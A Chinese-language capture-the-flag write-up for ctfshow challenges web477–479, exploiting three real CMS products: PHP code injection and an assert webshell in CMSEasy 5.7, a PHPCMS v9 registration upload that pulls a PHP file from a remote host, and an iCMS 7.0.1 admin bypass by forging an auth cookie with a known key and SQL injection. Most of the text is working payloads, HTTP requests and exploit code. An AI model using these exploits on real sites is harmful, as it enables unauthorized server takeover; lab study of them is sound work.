ctfshow web入门 CMS web477--web479

web477

CMSEazy5.7
不让扫，那就尝试一下admin路由，成功了
admin登录进入后台
也看到了其实

首页可以看到提示

然后去自定义标签打

1111111111";}<?php phpinfo()?>

刷新一下预览即可

11";}<?php assert($_POST[g]);?>

也可以getshell
能造成这些漏洞看了一下是因为之前此处填充的内容是反序列化存储的，但是我们如果使用";}就可以将其提前闭合从而达到命令执行的目的

web478

安装路径 your-domain/install/install.php
数据库用户名密码都是root 地址写127.0.0.1

先配置环境

PHPCMS V9 任意文件上传

来到登录页面说需要注册
查看了资料发现说注册页面可以任意文件上传
我们在本地写一个马

然后远程包含

request：

POST /index.php?m=member&c=index&a=register&siteid=1 HTTP/1.1
Host: f0397455-29ac-4c48-ab2c-6f95153b6513.challenge.ctf.show
Cookie: PHPSESSID=kqv02eurkeldvah1rnmh7g24j3
Sec-Ch-Ua: "Not/A)Brand";v="8", "Chromium";v="126", "Google Chrome";v="126"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Sec-Fetch-User: ?1
Referer: https://f0397455-29ac-4c48-ab2c-6f95153b6513.challenge.ctf.show/index.php?m=content&c=rss&siteid=1
Priority: u=0, i
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 158

siteid=1&modelid=11&username=test2&password=test2123&email=test2@163.com&info[content]=<img src=http://IP:12138/1.txt?.php#.jpg>&dosubmit=1&protocol=

response：

HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 29 Jul 2024 05:54:49 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Cache-Control: private
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
X-Powered-By: PHP/5.6.40
Access-Control-Allow-Methods: GET,POST,PUT,DELETE,OPTIONS
Access-Control-Allow-Credentials: true
Access-Control-Expose-Headers: Content-Type,Cookies,Aaa,Date,Server,Content-Length,Connection
Access-Control-Allow-Headers: DNT,X-CustomHeader,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Authorization,x-auth-token,Cookies,Aaa,Date,Server,Content-Length,Connection
Access-Control-Max-Age: 1728000
Content-Length: 660

<div style="font-size:12px;text-align:left; border:1px solid #9cc9e0; padding:1px 4px;color:#000000;font-family:Arial, Helvetica,sans-serif;"><span><b>MySQL Query : </b> INSERT INTO `phpcmsv9`.`v9_member_detail`(`content`,`userid`) VALUES ('&lt;img src=http://f0397455-29ac-4c48-ab2c-6f95153b6513.challenge.ctf.show/uploadfile/2024/0729/20240729015447865.php&gt;','1') <br /><b> MySQL Error : </b>Unknown column 'content' in 'field list' <br /> <b>MySQL Errno : </b>1054 <br /><b> Message : </b>  <br /><a href='http://faq.phpcms.cn/?errno=1054&msg=Unknown+column+%27content%27+in+%27field+list%27' target='_blank' style='color:red'>Need Help?</a></span></div>

已经是看到成功了，那么直接RCE即可

web479

iCMS-7.0.1前台登录绕过分析

GET /admincp.php HTTP/1.1
cookie：
iCMS_iCMS_AUTH=200b0c70aTDO4VR0iaABkIaqxhTDoDkQCdKpODWfphpw3hG%2BGfm47PMHJP32HEAgrAOwA9XWA1L96fSY9oc

审计代码根据key生成cookie

<?php
//error_reporting(0);
function urlsafe_b64decode($input){
    $remainder = strlen($input) % 4;
    if ($remainder) {
        $padlen = 4 - $remainder;
        $input .= str_repeat('=', $padlen);
    }
    return base64_decode(strtr($input, '-_!', '+/%'));
}

function authcode($string, $operation = 'DECODE', $key = '', $expiry = 0) {
    $ckey_length   = 8;
    $key           = md5($key ? $key : iPHP_KEY);
    $keya          = md5(substr($key, 0, 16));
    $keyb          = md5(substr($key, 16, 16));
    $keyc          = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : '';

    $cryptkey      = $keya.md5($keya.$keyc);
    $key_length    = strlen($cryptkey);

    $string        = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string;
    $string_length = strlen($string);

    $result        = '';
    $box           = range(0, 255);

    $rndkey        = array();
    for($i = 0; $i <= 255; $i++) {
        $rndkey[$i] = ord($cryptkey[$i % $key_length]);
    }

    for($j = $i = 0; $i < 256; $i++) {
        $j       = ($j + $box[$i] + $rndkey[$i]) % 256;
        $tmp     = $box[$i];
        $box[$i] = $box[$j];
        $box[$j] = $tmp;
    }

    for($a = $j = $i = 0; $i < $string_length; $i++) {
        $a       = ($a + 1) % 256;
        $j       = ($j + $box[$a]) % 256;
        $tmp     = $box[$a];
        $box[$a] = $box[$j];
        $box[$j] = $tmp;
        $result  .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));
    }

    if($operation == 'DECODE') {
        if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) {
            return substr($result, 26);
        } else {
            return '';
        }
    } else {
        return $keyc.str_replace('=', '', base64_encode($result));
    }
}

echo "iCMS_iCMS_AUTH=".urlencode(authcode("'or 1=1##=iCMS[192.168.0.1]=#1","ENCODE","n9pSQYvdWhtBz3UHZFVL7c6vf4x6fePk"));